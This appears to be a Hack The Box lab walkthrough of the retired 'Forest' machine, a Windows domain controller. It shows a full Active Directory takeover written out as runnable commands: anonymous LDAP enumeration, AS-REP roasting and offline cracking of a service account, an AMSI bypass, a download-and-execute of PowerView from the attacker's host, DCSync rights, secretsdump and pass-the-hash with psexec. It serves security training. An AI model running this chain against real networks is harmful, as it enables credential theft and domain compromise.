Forest: A walk through in hacking active directory
This box is on the retired list in hack the box. Here is a walk through on how I got full system privileges in this active directory environment.
Pre-Requisites installations needed in Kali:
winapsearch.py — https://github.com/ropnop/windapsearch
Impacket — https://github.com/SecureAuthCorp/impacket
Evil-WinRM — https://github.com/Hackplayers/evil-winrm
Bloodhound.py — https://github.com/fox-it/BloodHound.py
Installation walkthrough of prerequisites:
Impacket
sudo apt install python3-pip
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo python3 setup.py install
Evil-WinRM
sudo gem install evil-winrm
Bloodhound.py
Install bloodhound first. I have a walk through on how to do that here:
Bloodhound.py is what we will be using so we don’t have to get creative and drop sharphound on a windows box and evade Windows Defender Antivirus.
cd /opt
sudo git clone https://github.com/fox-it/BloodHound.py
cd BloodHound.py/
sudo pip3 install .
winapsearch.py
cd /opt
sudo git clone https://github.com/ropnop/windapsearch
sudo apt-get install python3-ldap
At this point we should be ready to enumerate our environment.
NMAP Scanning
nmap -A -T4 -p- 10.10.10.161
Port 389 being open and the service discovered as Active Directory LDAP is a dead giveaway that we are dealing with an Active Directory environment. Since 445 is open we are also able to determine that its on Windows Server 2016.
Since we have no user account credentials we need to continue to enumerate the environment so I am going to use winapsearch and see if I can bind anonymously to the domain and enumerate active directory account credentials.
Lucky for us the anonymous bind was successful and enumerated 28 accounts. (Anonymous binds typically do not happen in AD environments but this is the initial entry point to this box)
Next we will do a custom class wildcard. Custom class wild cards are useful to pipe out all OU’s, Groups, users, service accounts etc. Service accounts are the important ones as we may be able to determine applications running in the environment for further security research.
./windapsearch.py -d hb.local — dc-ip 10.10.10.161 — custom “objectClass=*”
After analyzing the 312 results we see a service account in use called “svc-alfresco”
After some google searching I find some documentation on Alfresco software and start researching how kerberos is configured with the service.
In the documentation we see that the Alfreco software does not require Kerberos pre authentication.
Impacket has a tool called GetNPUsers.py that can be use to specifically get TGT’s for accounts that are setup this way for offline cracking. See the description below for this Impacket example:
Command:
python3 ./GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
As you can see from the screenshot above we have successfully dumped the hash to the service account without the need to authenticate to the domain with a user name and password. Next we will attempt to crack the password offline.
Take the TGT hash and dump it to a file in mousepad called hash
If you haven’t done so in your Kali installation the rockyou wordlist is zipped in the following location:
/usr/share/wordlists/
You can unzip using the following command below:
Next execute john wherever you saved your hash file of the tgt for offline cracking:
Command to use:
sudo john hash — fork=4 -w=/usr/share/wordlists/rockyou.txt
The password for this service account has been successfully cracked. The password appears to be s3rvice.
Next lets we will prepare to research access based enumeration with bloodhound.py. (Referenced in my prereq installs)I recently found this project and I must say its very simplistic to use with any obtained credentials.
Command to execute:
python3 bloodhound.py -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
You will notice some json files get created in your bloodhound folder.
Next launch neo4j console as shown below:
Launch Bloodhound:
Login to bloodhound with neo4j and the password that was generated when you installed bloodhound back in my prerequisites section.
Once you are in bloodhound take all JSON files and just drag and drop them into bloodhound. Once done you should see a message similar to below.
Next lets query the service account. The first place we will want to check is reachable High Value Targets as shown below.
After checking reachable high value targets we discover our service account is a member of the Account Operators group which has Generic All permissions to the Exchange Windows Permissions Group.
The Exchange Windows Permissions Group has Write Dacl to the domain. This means we can create a user and give it Exchange Windows Permissions rights and give it DCSync ACL privileges with PowerView.
Before we launch Evil-WinRM. We will need to grab the powerview github repo found here:
The reason we need to do this is to apply DC Sync Permissions. Kali has powerview installed but for some reason I was having issues applying DCsync permissions when I pushed the powershell script over through Evil-WinRM.
So I ended up cloning PowerSploit from github.
Navigate to the recon directory and copy the PowerView.ps1 file to your Downloads directory.
Spin up a http server through python over port 80 from the downloads directory as shown below:
This will allow us to serve up the PowerView powershell script when we are ready to do so.
Next Launch Evil-WinRM with the service account creds we have obtained.
Command:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Now that we have a connection established to the domain controller over WinRM we need to create a new user and give them both Exchange Windows Permissions and Remote Management Users permissions.
Commands:
net user john P@ssw0rd /add /domain
net group “Exchange Windows Permissions” john /add
net localgroup “Remote Management Users” john /add
Next we will need to bypass AMSI in Evil WinRm. The command to bypass is Bypass-4MSI. As shown below in the menu option.
At this point we should be able to get our powerview PS1 file imported.
This is an excellent cheatsheet reference for powerview and other tools from Will.
Command:
iex(new-object net.webclient).downloadstring(‘http://10.10.14.17/PowerView.ps1')
We can also flip over to are simple http server and verify that the download was successful over port 80.
At this point we need to define our password and credential variables so we can add DCSync rights to our new active directory users.
Command:
$pass = ConvertTo-SecureString ‘P@ssw0rd’ -asplain -force
$cred = new-object system.management.automation.pscredential(‘htb\john’, $pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
Next we will use secrets dump from impacket to start dumping hashes from the domain controller. If you want to read more about what the secretsdump command does you can read the description at the following location:
Command to execute:
sudo secretsdump.py htb.local/john:P@ssw0rd@10.10.10.161
Finally we can use psexec.py to pass the hash and get a shell as system with the local administrator. No cracking is necessary.
Command:
sudo psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
